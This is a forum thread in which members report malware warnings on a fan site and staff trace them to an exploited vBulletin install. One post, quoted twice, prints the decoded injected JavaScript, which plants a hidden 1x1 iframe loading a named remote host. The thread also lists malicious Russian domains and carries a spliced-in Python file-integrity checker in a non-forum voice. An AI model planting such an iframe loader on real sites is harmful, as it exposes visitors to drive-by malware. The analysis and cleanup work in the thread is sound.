Hi Guys, Being a frequent visitor of this forum I know this is usually not a problem. Be careful though as my antivirus detected some hidden malware. I would suggest you check to make sure there isn't anything fishy going on. Thanks, just letting the admins be aware. :)
Guys Be Careful!
-
-
Yeah, Google Chrome warned me too. I ignored it and I was sent to some Russian sites.
-
Yep, I got a virus issue also. My security system even said it blocked one.
-
It keeps trying to load these pages from the main page of the forum.
Don't Click ! Malware !
Russhirt.ru
russiaurist.ru
Don't Click ! Malware !
I have no idea if this is helpful, because I don't know nothing about computers XD
-
It's being looked into.
Generally, since we don't host ads on our site, or allow uploads, attachments, scripts, or HTML on the forums, and it's all run on a Linux-based server, it should be impossible to have most of the usual malware problems, but it does seem something wonky is going on all the same.
Be careful and don't follow any random links, and make sure you have pop-up blockers on, and we'll try to have it sorted out as soon as possible.
-
Sigh… I've been getting the damn message now when I click on the 'forums' link.
Never had a problem with this site... but this is actually the first time I've EVER seen the message.
I'm not gonna worry.... but I visit this site a shit ton. So anything out of the ordinary can sometimes worry me.
-
I'm getting it too, from Avast! Antivirus. I'm sure it's nothing but it is pretty annoying.
-
This is a new problem. I don't think, based on what I'm looking at, that it's putting anyone at risk. We'll get it fixed ASAP either way, though.
-
I have received that warning all day long
-
The problem has been located and neutralized.
-
Yay. Heroes of the day.
-
You guys need to upgrade vBulletin too.
(and apparently brenn is only one who can do it -.-)
-
Does anybody know if this malware would prevent a computer from opening properly? My family's desktop right now can only be opened in safe mode. Trying to fix it now.
--- Update From New Post Merge ---
Update: It's working now so I guess it doesn't matter.
-
No problems right now or ever for me :ninja: .
-
Made a thread about this here
http://apforums.net/showthread.php?t=33564
Anyway nothing popped up on the index page today.
--- Update From New Post Merge ---
The problem has been located and neutralized.
So, what was causing it? Since Robby said that the site doesn't allow redirects, ads etc., I am really curious as to what it could have been.
-
Got a message again now D:
-
-
I just got it again too
I talked to holy about it on AIM and thought it was weird
just saying I'm still getting the warning message-
Warning: Something's Not Right Here!
apforums.net contains content from abnev.ru, a site known to distribute malware. Your computer might catch a virus if you visit this site.
even if the problem is fixed. still gonna browse the forums but it seems weird!
-
Yeah, I see the problem. We'll deal with it as soon as I can locate an admin.
@No:
So, what was causing it? Since Robby said that the site doesn't allow redirects, ads etc., I am really curious as to what it could have been.
Security exploit in the VBulletin software. We need to upgrade. It's on the list, and rapidly gaining priority.
-
Since my browser was asking permission for a Java plug-in, I guess the problem was a Java drive-by, which someone put in this site…
-
Security exploit in the VBulletin software. We need to upgrade. It's on the list, and rapidly gaining priority.
I think index.php file (or folder) is 777. But yes some other exploit too in our current version of vB.
Looking at the malware code, it's an encrypted JS which decrypts to:
```
// Sets a property on an object only if that property already exists on it
function xj(sjvkgbdhot, jji, mnftjz) { if (jji in sjvkgbdhot) { sjvkgbdhot[jji] = mnftjz; } }
var ndqysgvlovy = window;
var html = "";
var qbgc = ndqysgvlovy.document;
var fos = "XOR";
var nzxtaaeol = qbgc.createElement;
// Helper functions that only return constant strings, hiding them from a plain text search
function alkjcakjwerwrbjsdlf() { return "iframe"; }
function afdlidhadekwr12() { return "width"; }
var rvqbphwb = qbgc.body.appendChild;
function get17(enc) { if (enc == undefined) { enc = ""; } return "src"; }
var iter = 0;
function vslkrjrsa() { return "height"; }
var siecugtayix = null;
// Create the iframe element
if ("call" in nzxtaaeol) { siecugtayix = nzxtaaeol.call(qbgc, alkjcakjwerwrbjsdlf()); } else { siecugtayix = nzxtaaeol(alkjcakjwerwrbjsdlf()); }
var lost = "fieldset";
// Make it 1x1 so it is effectively invisible, then point it at the remote URL
xj(siecugtayix, afdlidhadekwr12(), "1");
xj(siecugtayix, vslkrjrsa(), "1");
xj(siecugtayix, get17(), "http://yandekapi.com/api?in=847");
// Append the iframe to the page body
if ("call" in rvqbphwb) { rvqbphwb.call(qbgc.body, siecugtayix); } else { rvqbphwb(siecugtayix); }
```
So it calls that yandekapi, which later loads that ru site. But this is why you should always use Firefox with NoScript.
-
I got the error from Chrome as well (using Mac OS X Snow Leopard). I chose proceed and nothing else happened.
-
I think index.php file (or folder) is 777. But yes some other exploit too in our current version of vB.
Looking at the malware code, it's an encrypted JS which decrypts to:
```
// Sets a property on an object only if that property already exists on it
function xj(sjvkgbdhot, jji, mnftjz) { if (jji in sjvkgbdhot) { sjvkgbdhot[jji] = mnftjz; } }
var ndqysgvlovy = window;
var html = "";
var qbgc = ndqysgvlovy.document;
var fos = "XOR";
var nzxtaaeol = qbgc.createElement;
// Helper functions that only return constant strings, hiding them from a plain text search
function alkjcakjwerwrbjsdlf() { return "iframe"; }
function afdlidhadekwr12() { return "width"; }
var rvqbphwb = qbgc.body.appendChild;
function get17(enc) { if (enc == undefined) { enc = ""; } return "src"; }
var iter = 0;
function vslkrjrsa() { return "height"; }
var siecugtayix = null;
// Create the iframe element
if ("call" in nzxtaaeol) { siecugtayix = nzxtaaeol.call(qbgc, alkjcakjwerwrbjsdlf()); } else { siecugtayix = nzxtaaeol(alkjcakjwerwrbjsdlf()); }
var lost = "fieldset";
// Make it 1x1 so it is effectively invisible, then point it at the remote URL
xj(siecugtayix, afdlidhadekwr12(), "1");
xj(siecugtayix, vslkrjrsa(), "1");
xj(siecugtayix, get17(), "http://yandekapi.com/api?in=847");
// Append the iframe to the page body
if ("call" in rvqbphwb) { rvqbphwb.call(qbgc.body, siecugtayix); } else { rvqbphwb(siecugtayix); }
```
So it calls that yandekapi, which later loads that ru site. But this is why you should always use Firefox with NoScript.
I'm well aware of what's causing the problem, but thanks. I just need an admin to be able to fix it.
Oh and it's fixed btw.
-
I am not getting the message anymore, but it seems like other people still are. I think you are right that it is being done through some forum exploit.
Oh just read the post above. Yeah glad the issue is taken care of.
-
I just got the message again off Google Chrome when going into the forum section, proceeded anyway and Avast blocked some malware >.>..
-
Huh? I just checked the HTML and I see nothing.
-
Huh? I just checked the HTML and I see nothing.
It showed up for me a while ago too. Nothing now…..
-
-
Actually, I'm getting the messages again too. Just started again like two minutes ago.
-
-
It just keeps coming and going doesn't it? just got the message again =/
-
I see the problem. Sigh.
-
Seems like Avast and/or Google Chrome is a hypochondriac.
-
We're getting attacked pretty frequently. I've been given temporary power to deal with it until we can patch a security fix.
-
We're getting attacked pretty frequently. I've been given temporary power to deal with it until we can patch a security fix.
I'm pretty much a computer noob, but I'd like to ask exactly how the hell did they manage to do it ?
-
We're getting attacked pretty frequently. I've been given temporary power to deal with it until we can patch a security fix.
just an idea: how about adding a cron job to keep fixing until perm solution is found.
-
Also, could we merge mine and this topic, just so people don't stay in the dark because they post in just one ?
-
@No:
I'm pretty much a computer noob, but I'd like to ask exactly how the hell did they manage to do it ?
There's a question I'd really rather not answer.
just an idea: how about adding a cron job to keep fixing until perm solution is found.
I don't believe I have such flexibility. The tools I'm provided are pretty crap.
-
Oh… that kinda sucks and means it's more work for you.
Keep the good work up.
-
Thx for the hard work Jonas, brennen and Urouge.
-
@Don:
Thx for the hard work Jonas, brennen and Urouge.
Agreed - I'm not getting anything here - but I am on work computers using IE7 (can not use anything else) but I was wondering what is it to look out for?
-
…and apparently brenn is only one who can do it -.-
Don't give me that face, punk ass!
@No:
So, what was causing it? Since Robby said that the site doesn't allow redirects, ads etc., I am really curious as to what it could have been.
Whatever/whoever it was, it was using the exploit on the version of vB we had to insert a script that would load/redirect to some other site that contained malware and such. Likely a bot just crawling through and looking for vulnerable sites.
just an idea: how about adding a cron job to keep fixing until perm solution is found.
Of the four I saw, only two were in the same place, so I'm not sure it would have helped. None of the folders were 777; one, for the styles, had been in the past but that was because the upgrade to vB4 was having issues, and I changed it back afterward.
The reason the upgrade took so long was because, yeah, I'm one of the few who can and will do the upgrade at the moment, but more importantly because close to none of our plugins are supported beyond the version of vBulletin we had, this Fishman Island theme included. I didn't want to upgrade unless we had to because it could have caused more problems than it was worth. With the frequent exploits this week, however, we couldn't wait any longer. Fortunately most of the issues from the upgrade have been ironed out and only one plugin had to be disabled (temporarily).
It's also a pain in the butt to run vBulletin upgrades. Between checking the fixes and features, updating tables, backing up the db, copying the new files, running the upgrade, upgrading the plugins, fixing the plugins, fixing the themes, fixing permissions, testing the site afterward, etc, etc… it takes forever. So annoying. I hate you vBulletin!
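The cron-job suggestion and the observation that the injections turned up in different places both point at a whole-tree integrity check. The following is an added example, not part of any post and not the forum's own tooling: it hashes every file under a webroot, compares against a stored baseline, and flags world-writable files and folders. The function names and the constructed webroot in `demo()` are hypothetical, and it only covers files on disk.

```python
import hashlib, os, stat, tempfile

def snapshot(webroot):
    """Map every file and folder under webroot to its SHA-256 and mode bits."""
    manifest = {}
    for dirpath, dirs, files in os.walk(webroot):
        for name in dirs + files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # symlinks are not followed or recorded
            digest = None  # folders carry a mode but no content hash
            if os.path.isfile(full):
                with open(full, "rb") as fh:
                    digest = hashlib.sha256(fh.read()).hexdigest()
            mode = stat.S_IMODE(os.stat(full).st_mode)
            manifest[os.path.relpath(full, webroot)] = {"sha256": digest, "mode": mode}
    return manifest

def compare(baseline, current):
    """Return (finding, path) pairs; world-writable is reported on every run."""
    findings = []
    for path, info in sorted(current.items()):
        if path not in baseline:
            findings.append(("new", path))
        elif info["sha256"] != baseline[path]["sha256"]:
            findings.append(("modified", path))
        if info["mode"] & stat.S_IWOTH:
            findings.append(("world-writable", path))
    findings += [("missing", p) for p in sorted(baseline) if p not in current]
    return findings

def _write(root, rel, text):
    path = os.path.join(root, rel)
    with open(path, "w") as fh:
        fh.write(text)
    os.chmod(path, 0o644)  # fixed mode so the result does not depend on umask

def demo():
    """Constructed webroot: take a baseline, simulate tampering, compare."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "styles"))
        os.chmod(os.path.join(root, "styles"), 0o755)
        _write(root, "index.php", "<?php echo 'forum'; ?>")
        _write(root, "styles/main.css", "body {}")
        baseline = snapshot(root)  # in practice, store this off the web server
        _write(root, "index.php", "<?php echo 'forum'; ?><!-- injected -->")
        _write(root, "styles/x.php", "<?php /* unexpected new file */ ?>")
        os.chmod(os.path.join(root, "styles"), 0o777)
        return compare(baseline, snapshot(root))

if __name__ == "__main__": print(demo())
```

The manifest is plain dictionaries, so it can be saved as JSON after a known-good deploy and compared on a schedule; the baseline has to be retaken after each legitimate upgrade.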
-
Haha… Brennen - The Last Standing Pillar of Arlong Park!
But yeah, I understand that it's a pain in the ass upgrading software (it's more pain fixing compatibility issues). I spent most of last 24 hours fixing similar issues for someone and by the time I was done, I really hated that terminal screen and nano. So yeah, I understand and feel for you and thanks a lot for the hard work ^_^
-
Speaking of pains in the butt… Fire-Fist, and others, I know some of you were interested in themes before, well, I'm open to anyone who wants to try and make a theme, and I will be pushing something in the near future that should allow easier development for the theme. In the meantime, if you don't want to build from the ground up, I suggest you start getting ideas from vbulletin.org in the 4.X styles section; if you like something, I can grab it and we can get to work. Keep in mind our version number, there might be compatibility issues, but for the most part if you know what you are doing (like Fire-Fist), coming up with something decent shouldn't be a stretch. I've been really busy since the upgrade in April, so I sort of put all this junk on the backburner, but I had another (darker) theme like 80% ready to go... I'm just not impressed with it. Urouge and I have been working on tweaking it this last week, so we might just say screw it and push it out over the next few weeks. There are a few others I will be working on as well... I'm sure you all have ideas and suggestions, so feel free to put them out there. I'll try and get that mobile version out as well, for those of you who browse from their phones. /exhale
-
I'm getting malware warnings from Chrome again on the main forums page. No sir, I don't like it!
Wonder what the deal is.
-
Happened to me too.
God dammit guys :(
-
Well now there's a bad sign.
I fixed the injection, but now it's back to the security issue again.
-
Oh I got this on my laptop maybe an hour ago? I was using google chrome though, clicked the main forum index and POOF, virus warning -.- it never happens on firefox on the main PC though so it doesn't usually bother me.
-
Damn, this is bad… do we actually know how exactly he is injecting?
-
I'm pretty sure I've figured out the issue. It'll take me some time to fix it assuming I'm right, but if I am it should take care of all the problems.